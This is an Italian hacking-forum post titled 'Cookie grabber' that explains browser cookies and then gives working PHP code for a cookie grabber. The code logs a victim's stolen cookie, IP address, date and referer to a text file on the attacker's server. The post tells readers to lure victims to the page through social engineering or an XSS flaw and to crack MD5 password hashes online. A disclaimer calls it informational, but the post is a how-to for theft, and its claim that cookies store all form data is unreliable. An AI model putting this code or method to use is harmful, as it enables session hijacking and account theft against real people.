Total Hack Cheat
Benvenuto/a su Total hack Cheat....
non aspettate altro tempo Registratevi!!

Cookie grabber

Vedere l'argomento precedente Vedere l'argomento seguente Andare in basso

Cookie grabber

Messaggio Da RaYoZ il Lun Set 06, 2010 9:43 pm

IL MATERIALE ? UNICAMENTE A SCOPO INFORMATIVO E IL FORUM NON SI RITIENE RESPONSABILE IN ALCUN MODO DI UN EVENTUALE CATTIVO USO CHE NE VERR? FATTO!




Intanto cos'? un cookie:
Altro non ? che un file di testo contenente determinati dati e viene inviato dal server web in contemporanea alla pagina internet e successivamente salvato in una cartella del vostro browser.
Servono per far si che il borwser possa identificarli in modo da associarli al server che li ha generati. Di conseguenza possiamo dire che ogni server prosuce il suo cookie per permetterne poi il riconoscimento quando ci si ricollega.

Inoltre un cookie memorizza cnhe tutti i dati inseriti nei form, come username e password per accedere ad aree riservate di siti. avviene pi? precisamente che dopo aver inserito i dati di accesso ad esempio e dato l'ok, il server ci genera il cookie contenente tali dati in modo da esser riconosciuti dal server anche al prossimo accesso...si intuisce che qualora settassimo il nostro browser in modo da rifiutare i cookie, non ci si potrebbe autenticare su nessun sito.

Qundi vien generato un cookie ogni volta che visitate qualunque sito e vengon salvate tutte le impostazioni e operazioni che fate.
Capite allora la grossa importanza di un cookie e il "potere" che esso ha!
E a questo punto sorge la domanda: e se qualcuno si impossessasse dei miei cookie? meglio ancora dei cookie con dati di accesso...?
E qui ecco che subentra appunto il cookie grabber!!!


Cookie grabber:
Catturando dei cookie con un cookie grabber, si pu? risalire quindi a tante informazioni personali delle vittime alle quali li abbiamo sottratti.
Bastano poche righe di codice in php per creare un cookie grabber e implementarlo e utilizzarlo in diversi modi...un esempio e con una XSS.

Scriviamo queste poche righe di codice su un qualsiasi editor di testo, salviamo il file nel formato .php e lo uppiamo sul nostro spazio web. A questo punto basta indirizzare in qualche modo la vittima alla pagina web alla quale ? collegato il cookie grabber (con un po' di social engineering) e saranno catturati i suoi cookie con tutti i dati...anche username e password...che saranno salvati su un file .txt che si trova sempre nel nostro spazio web (nell'esempio saranno salvati nel file "file.txt").
Le password non saranno esplicite per?, ma in "hash md5" (cio? criptate con questa chiave)...ma basta un semplice programma o uno dei tanti siti web che offrono la conversione da questa forma criptata in forma chiara e leggibile, ed ? fatta.

Esempio di un cookie grabber:

CODICE
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('file.txt', 'a');
fwrite($fp, 'Cookie: '.$cookie.'
IP: ' .$ip. '
Date and Time: ' .$date. '
Referer: '.$referer.'

');
fclose($fp);
?>

RaYoZ
Admin
Admin

Messaggi : 1040
Punti : 2245
Data d'iscrizione : 03.04.10
Età : 22
Località : immerso nei pensieri

Tornare in alto Andare in basso

Vedere l'argomento precedente Vedere l'argomento seguente Tornare in alto


 
Permesso di questo forum:
Non puoi rispondere agli argomenti in questo forum